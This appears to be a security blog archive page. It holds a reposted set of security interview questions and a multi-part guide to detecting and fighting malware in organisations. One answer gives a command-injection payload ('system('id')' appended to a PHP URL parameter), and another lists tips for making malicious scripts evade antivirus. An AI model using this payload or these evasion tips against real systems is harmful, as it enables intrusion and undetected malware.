web analytics

Archive for the ‘Malware’ Category

9 Essential System Security Interview Questions

  1. What is a pentest?

“Pentest” is short for “penetration test”, and involves having a trusted security expert attack a system for the purpose of discovering, and repairing, security vulnerabilities before malicious attackers can exploit them. This is a critical procedure for securing a system, as the alternative method for discovering vulnerabilities is to wait for unknown agents to exploit them. By this time it is, of course, too late to do anything about them.

In order to keep a system secure, it is advisable to conduct a pentest on a regular basis, especially when new technology is added to the stack, or vulnerabilities are exposed in your current stack.


2. What is social engineering?

“Social engineering” refers to the use of humans as an attack vector to compromise a system. It involves fooling or otherwise manipulating human personnel into revealing information or performing actions on the attacker’s behalf. Social engineering is known to be a very effective attack strategy, since even the strongest security system can be compromised by a single poor decision. In some cases, highly secure systems that cannot be penetrated by computer or cryptographic means, can be compromised by simply calling a member of the target organization on the phone and impersonating a colleague or IT professional.

Common social engineering techniques include phishing, clickjacking, and baiting, although several other tricks are at an attacker’s disposal. Baiting with foreign USB drives was famously used to introduce the Stuxnet worm into Iran’s uranium enrichment facilities, damaging the nation’s ability to produce nuclear material.

For more information, a good read is Christopher Hadnagy’s book Social Engineering: The Art of Human Hacking.

3. You find PHP queries overtly in the URL, such as /index.php=?page=userID. What would you then be looking to test? 

This is an ideal situation for injection and querying. If we know that the server is using a database such as SQL with a PHP controller, it becomes quite easy. We would be looking to test how the server reacts to multiple different types of requests, and what it throws back, looking for anomalies and errors.

One example could be code injection. If the server is not using authentication and evaluating each user, one could simply try /index.php?arg=1;system(‘id’) and see if the host returns unintended data.

4. You find yourself in an airport in the depths of of a foreign superpower. You’re out of mobile broadband and don’t trust the WI-FI. What do you do? Further, what are the potential threats from open WI-FIs?

Ideally you want all of your data to pass through an encrypted connection. This would usually entail tunneling via SSH into whatever outside service you need, over a virtual private network (VPN). Otherwise, you’re vulnerable to all manner of attacks, from man-in-the-middle, to captive portals exploitation, and so on.

5. What does it mean for a machine to have an “air gap”? Why are air gapped machines important?

An air gapped machine is simply one that cannot connect to any outside agents. From the highest level being the internet, to the lowest being an intranet or even bluetooth.

Air gapped machines are isolated from other computers, and are important for storing sensitive data or carrying out critical tasks that should be immune from outside interference. For example, a nuclear power plant should be operated from computers that are behind a full air gap. For the most part, real world air gapped computers are usually connected to some form of intranet in order to make data transfer and process execution easier. However, every connection increases the risk that outside actors will be able to penetrate the system.


6. You’re tasked with setting up an email encryption system for certain employees of a company. What’s the first thing you should be doing to set them up? How would you distribute the keys?

The first task is to do a full clean and make sure that the employees’ machines aren’t compromised in any way. This would usually involve something along the lines of a selective backup. One would take only the very necessary files from one computer and copy them to a clean replica of the new host. We give the replica an internet connection and watch for any suspicious outgoing or incoming activity. Then one would perform a full secure erase on the employee’s original machine, to delete everything right down to the last data tick, before finally restoring the backed up files.

The keys should then be given out by transferring them over wire through a machine or device with no other connections, importing any necessary .p7s email certificate files into a trusted email client, then securely deleting any trace of the certificate on the originating computer.

The first step, cleaning the computers, may seem long and laborious. Theoretically, if you are 100% certain that the machine is in no way affected by any malicious scripts, then of course there is no need for such a process. However in most cases, you’ll never know this for sure, and if any machine has been backdoored in any kind of way, this will usually mean that setting up secure email will be done in vain.

7. You manage to capture email packets from a sender that are encrypted through Pretty Good Privacy (PGP). What are the most viable options to circumvent this?

First, one should be considering whether to even attempt circumventing the encryption directly. Decryption is nearly impossible here unless you already happen to have the private key. Without this, your computer will be spending multiple lifetimes trying to decrypt a 2048-bit key. It’s likely far easier to simply compromise an end node (i.e. the sender or receiver). This could involve phishing, exploiting the sending host to try and uncover the private key, or compromising the receiver to be able to view the emails as plain text.

8. What makes a script fully undetectable (FUD) to antivirus software? How would you go about writing a FUD script? 

A script is FUD to an antivirus when it can infect a target machine and operate without being noticed on that machine by that AV. This usually entails a script that is simple, small, and precise

To know how to write a FUD script, one must understand what the targeted antivirus is actually looking for. If the script contains events such as Hook_Keyboard(), File_Delete(), or File_Copy(), it’s very likely it wil be picked up by antivirus scanners, so these events are not used. Further, FUD scripts will often mask function names with common names used in the industry, rather than naming them things like fToPwn1337(). A talented attacker might even break up his or her files into smaller chunks, and then hex edit each individual file, thereby making it even more unlikely to be detected.

As antivirus software becomes more and more sophisticated, attackers become more sophisticated in response. Antivirus software such as McAfee is much harder to fool now than it was 10 years ago. However, there are talented hackers everywhere who are more than capable of writing fully undetectable scripts, and who will continue to do so. Virus protection is very much a cat and mouse game.

9. What is a “Man-in-the-Middle” attack?

A man-in-the-middle attack is one in which the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. One example is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker, who even has the ability to modify the content of each message. Often abbreviated to MITM, MitM, or MITMA, and sometimes referred to as a session hijacking attack, it has a strong chance of success if the attacker can impersonate each party to the satisfaction of the other. MITM attacks pose a serious threat to online security because they give the attacker the ability to capture and manipulate sensitive information in real-time while posing as a trusted party during transactions, conversations, and the transfer of data. This is straightforward in many circumstances; for example, an attacker within reception range of an unencrypted WiFi access point, can insert himself as a man-in-the-middle.

This article is from Toptal.

Most Aggressively Spreading Malware Binaries

hello again!
with that live list you can search various sites for MD5 file names and keep updated regarding what and how those malware are spreading in your network.
this site is my bible regarding malware searching and fighting.


Roy Coren
Security Specialist
Roycoren AT gmail.com

Malware Fighting Tools/Guides – Part 3 :Down and Dirty

Before we start – I just want to declare that the thing I publish here are Based on my experience only and in no means you should understand to buy or not to buy specific products.
After understanding the essentials of CISO’s work, I’ll expand on how I did the research work from part1 alongside with my incident response team from part 2.
Regarding the tools I have mentioned earlier , those needs to give you FULL view from the bottom up on every request \ connection to the internet starting from the users endpoint to firewall\proxy and DNS requests and cross dissect the findings to give you positive catch.
C&C life cycle:

1) Hostile Downloaded from “some” website or using exposed browser holes to get into a computer.
BTW – the hostile file can be an innocent legitimate skype.exe file that has been downloaded NOT from skype website…

2) If section 1 succeeded and no AV engine has stopped it , the hostile file is trying to “sniff” it’s way inside your organization , trying to elevate privileges and get as much as information as he can before going into phase II.

3) After getting some idea of how your organization “works” – the hostile file trying to get out and connect to the operator site , this phase usually known as domain fluxing and expressed by multiple burst random DNS searches to sites like [aabbccdd.your company domain extension ] or any other random sequence.
At this step – if you have implemented the right products, the hostile activity should be block at your gateway via IDS\IPS \FW \proxy\url filtering\DLP or any other PREVENTION product.
If it doesn’t and you need to look at step 4 – chances are you are in deep trouble…

4) Also known as Phase II, in which the hostile file –using it’s operator, are evolving into one unit that is fully aware of your organization methods and can exploit almost any aspect on your INTERNAL network.
This includes admin users, passwords, emails, internal ip’s ,DC’s, DNS ,AD and even firewall changing data.
This allows the attacker or shell we say “your commander” , to do whatever he likes in your data. 1-0 to the bad guys….
The first question you might ask is: if my AV vendor is not discovering the bad guys , what can I do?
Well – a good one…this brings me back to my friend original request once again. And the answer is:
No AV vendor is “the one” , enough to look at sites like Virus total or URL Query to see that even 10 AV engines together can miss…therefore you need special tools for this special jobs.
Or worst , if you trust your AV vendor as your sole solution for security – change your job…
It has got to be a BEST OF BREAD solutions that will answer your dynamic organization’s requests and whims..
They MUST be able to do the following in order to crossfire any hostile file in your environment.

Also make sure you IRT team are Using them and their results on a daily bases, in fact – base your security protocols and procedures on their output.

1) Security Event Management (SIEM): [ Such As Arcsight ,Symantec,RSA ]
Connect every available and relevant device to your SIEM and write basic rules .
Improve those rules as you go and remember, those devices can archive almost everything that happened on your network fairly easily, it is the correlation between those events that makes your life easier.


2) A cross stream line analyzer: [ Such As Damballa FailSafe , Fire Eye , websense Full Suite, advanced Proxy\URL filtering ]
This device sole purpose is to analyze the data from the endpoint to the DNS server \ Proxy \ FW and correlate them to one valid event.
As I explained in the C&C life cycle , it is essential to expose the hostile before phase II , meaning if you can catch one machine [or Asset] trying to contact hostile URL or doing a Domain fluxing –than phase II won’t be an issue for you.
Hell , you can even make these connections terminate automatically or have an event based action to your remediate device.


3) Investigating tool: [ Such As : Sillicium ECAT , HBGARY responder or even GMER or Comodo CCE ]
MUST HAVE The “cross platform approach” , meaning running in your whole enterprise as a natural endpoint agent , collecting ALL your computers\servers files into one place ,analyzing them and give you suspected or convicted files.
The methods should be as follow :

a) Compare your files through several MD5 signatures databases such as BIT9, NIST, MSDN, or any other Cloud based comparison engine(HITMAN\CCE)
This will bring UP all the files that has no valid or Root CA or No Company embedded in them -so only sealed authentic files can reside on your machines.
Any other result such as unknown files or broken CA – can imply that the file has been compromised by another hostile that may take additional steps, such as injecting DLL’s into other processes\Services and loading a rootkit, or connecting to additional C&C sites.

b) Use Several AV engines or upload your suspicious files from section A to sites like VirusTotal and similar. You can even upload the MD5 string to the web , you can consult with other findings on your specific hash.

c) Analyze Floating codes and memory Hash in live mode.

d) Create your OWN white list of files that has been created by your organization software developers – and direct them to work as methodically as they can.

e) Check your current network connection from the process and up.
Meaning if you can see EXCEL.exe reaching out to the internet – it is NOT looking to be updated from microsoft…
Even Simple NETSTAT –NAB can give you desired results.

f) Use a good URL filtering engine\Anti Bot – this actually should be the first DOT in the line of crossfire since you will most probably have an alert from your URL filtering device saying on machine tried to reach a hostile website. You can advise many other Online URL Checking tools.
a good tool in this section has to be one that updates as quickly as he can – since automated cleaning processes are happening on those websites almost whithin the hour – so before you block an access to it from your domain – make sure the danger hasn’t passed already…

From there you can start your query using all the tools and methods I have mentioned the more conclusive results on an evil residing on a machine you’ll get – the better.

this approach is the NOT bullet proof – but it will defiantly filter out above 95+% of your hostile files..therefore keep up with the technology and bring the human resource to the game.



Roy Coren

Security Specialist

[email protected]

Malware Fighting Tools/Guides – Part 2 , How to be an Ace CISO

If one of my customers would come today and ask me to design a full method to eliminate unwanted or dangerous files in his domain, I would say “No such thing”.

One of the reasons is that you can’t keep your sensitive enviroment clean enough without damaging the users freedom and productivity. Especially VP’s.

Most of the time CISO and IT managers come to me AFTER somebody has made a 207 or 207A on their domain (that’s the police code for Kidnapping) , in that case you have a legal and usually a very big Go! From the CTO\CEO to do everything you can to stop it from happening again.

Those are the good time for software vendors \integrators who can celebrate a 100% sell rate on those companies.

But – as you guessed, those time pressed CISO’s  are not always aware on which products to implement and most important which technology will give them the best results per dime for the longest time…having that said without the right consultant the will take Pain and turn it to Gain, they usually invest in the wrong methods.

Getting back to the original “bug free” request, on those special cases I would recommend a full revision in the company approach to data security, starting from bottom up.

Implementing a good solid, management backed, data security policy is not something that happened in a day, but it is worth putting a lot of effort and starts something good and harvest those applause later

Issues to consider:

–          Have every user to sign that the computer\software he gets from the company are NOT his own.

–          Publish a list of allowed software in your organization-saying that anything besides that list will cause issues with the HR department…

–          Start by classifying  and identifying your:

1)      Sensitive data – “Show me your data and I’ll tell you how to protect it”

In most cases you will find that they DO NO know the location and the amount of it…this step alone take several months to complete

2)      Weakest points in the LAN \WAN\DMZ

3)      Everyday use data flow – this is the stream that all problems are starting from.

4)      Gather and estimate your human resources, see if the team needs additional knowledge and if he can handle 911 calls and everyday tasks.

In most cases you will find 1 or 2 persons doing 5 persons jobs – this is not the kind of situation you would want to be when implementing a large DLP or SIEM project and realize your team can’t decrypt the results or lack of time to do it.

–          Harden security policies on Mobile users – have smartphones and laptops use hard rules and policies without losing the dynamic of work productivity.

–          Offer well known , dumb proof, productive solutions for the issues above, you can start by drilling down your AD GPO and dead users, continue with AV kill rate to start ,along with your main firewalls rules and block ratio.

–          Keep your software up to date – probably the best tip I can give , no holes ,no foxes…

–          Assign virtual “Data owners” – have them to take responsibility on their data in terms of backup and unwanted access.

–          Pick less tools and solutions as possible for all the scenarios you can imagine – if the 911 call will arrive , the first thing you need is to act as fast as possible and you would want the best results \outcomes\ logs\ products refined and stilled to your desktop.

Now you can start thinking on wide projects like DLP, Endpoint security, SIEM, virtual security, IDS\IPS and most important – a descent monitoring system Or any other solutions that your organization needs – just make sure it fits your gold rules above.

With the outcomes of those  products , you can assign an incident response team to be the task force for all kinds of alarms and events.

And since you will get tens of millions events per day, if this team can handle 10 REAL security events per day , you have scored it! Ace!

See you on part 3..

Roy Coren

Security Specialist

[email protected]

Malware Fighting Tools/Guides

I have done some massive research and long term deep investigations – and this Checkpoint AntiBot module has got a very high percentage of accuracy on live Malware and C&C communications residing on machines.
Those tools helped me along the way to deal and remove those evils in a haystack (besides the obvious Format c: /q ).
It has also a knowledge base containing everything you need to know about those evils and their families.
For more information on what was my methodology of my research and with what tools i used -you can write to my email


Roy Coren,
Security Specialist
[email protected]